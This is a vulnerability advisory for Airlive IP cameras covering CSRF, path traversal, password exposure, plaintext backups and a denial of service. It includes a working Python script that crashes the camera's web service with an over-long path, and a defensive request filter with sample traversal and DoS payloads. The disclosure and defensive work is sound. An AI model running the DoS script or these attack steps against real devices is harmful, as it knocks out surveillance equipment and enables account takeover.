The information has been provided by Eliezer Varad Lopez, Javier Repiso Sanchez and Jonás Ropero Castillo.
Cross Site Request Forgery (CSRF)
CVE-2013-3540: CSRF via the GET method, a targeted attack against any administrator. These cameras use a web interface that is prone to CSRF vulnerabilities. A malicious user can attempt targeted attacks by sending a crafted CSRF vector, which allows web interface parameters to be manipulated. In the following example we will make a vector to create an alternative user with administration credentials.
Relative Path Traversal
CVE-2013-3541: path traversal that allows you to read the file system configuration.
Sensitive Information Exposure + Privilege Escalation
CVE-2013-3686: exposure of sensitive data by requesting the following URL
We can decode the admin password (Base64).
Now we can log in again as the admin user, which completes the privilege escalation.
Clear Text Storage of Sensitive Information
CVE-2013-3687: all the sensitive information about the device is stored in plain text inside the backup file. You can open it with any text editor and look for user information, for example passwords, user names and so on.
Denial of Service (DoS)
CVE-2013-3691: DoS by overflowing the path /. A request with a large number of "a" characters can take down the HTTP service of the camera device.
You will get the following message: "Connection has been reset". After removing the added characters and refreshing the page, you will get the message "Can't Connect". The service stays down for around 2 min, but if the request is repeated, for example every 1 min, the camera will never recover by itself.
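The following Python script could be used to test the DoS:

    import socket

    cam_ip = "192.0.2.10"  # placeholder: address of the camera under test
    request = b"GET /" + b"A" * 3000 + b".html HTTP/1.0\r\n"  # over-long path
    s = socket.socket()
    s.connect((cam_ip, 80))
    s.sendall(request)
    response = s.recv(1024)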
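
The following is an added example, not part of the original advisory: a request screen that a reverse proxy placed in front of such a camera could apply to reject the three request patterns described above (over-long path, path traversal, cross-site GET carrying parameters). The length limit, the trusted host name, the function name and the sample requests are constructed assumptions.

```python
from urllib.parse import urlsplit, unquote

MAX_PATH_LEN = 256            # assumption: the camera UI never needs longer paths
TRUSTED_HOST = "cam.example"  # assumption: host name the admin UI is served from


def screen_request(request_line, headers):
    """Return a list of reasons to reject the request (empty list = allow)."""
    parts = request_line.split(" ")
    if len(parts) != 3:
        return ["malformed request line"]
    method, target, _version = parts
    url = urlsplit(target)
    reasons = []

    # DoS pattern: an over-long path such as '/' + 'A' * 3000 + '.html'
    if len(url.path) > MAX_PATH_LEN:
        reasons.append("path too long")

    # Path traversal: decode repeatedly so %2e%2e and double encoding are caught
    decoded = url.path
    for _ in range(3):
        decoded = unquote(decoded)
    if ".." in decoded.replace("\\", "/").split("/"):
        reasons.append("path traversal")

    # CSRF via GET: a parameterised request must come from the UI's own origin
    if method == "GET" and url.query:
        referer_host = urlsplit(headers.get("Referer", "")).hostname
        if referer_host != TRUSTED_HOST:
            reasons.append("cross-site parameterised GET")
    return reasons


# Constructed sample requests (hypothetical paths, not taken from the advisory)
SAMPLES = [
    ("GET /index.html HTTP/1.0", {}),
    ("GET /" + "A" * 3000 + ".html HTTP/1.0", {}),
    ("GET /ui/%2e%2e/%2e%2e/config HTTP/1.0", {}),
    ("GET /ui/settings?name=value HTTP/1.0", {"Referer": "http://other.example/p"}),
    ("GET /ui/settings?name=value HTTP/1.0", {"Referer": "http://cam.example/users"}),
]

if __name__ == "__main__":
    for line, hdrs in SAMPLES:
        print(line[:40], "->", screen_request(line, hdrs) or "allow")
```

A Referer check only narrows the CSRF exposure; the durable fix is for state-changing actions to require a per-session token and a non-GET method in the device firmware.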
- 2013-05-31: The student team notifies Airlive Customer Support of the vulnerabilities. No reply received.
- 2013-06-03: The students ask for a reply.
- 2013-06-05: The Airlive team reports to technical support so that the vulnerabilities can be analyzed.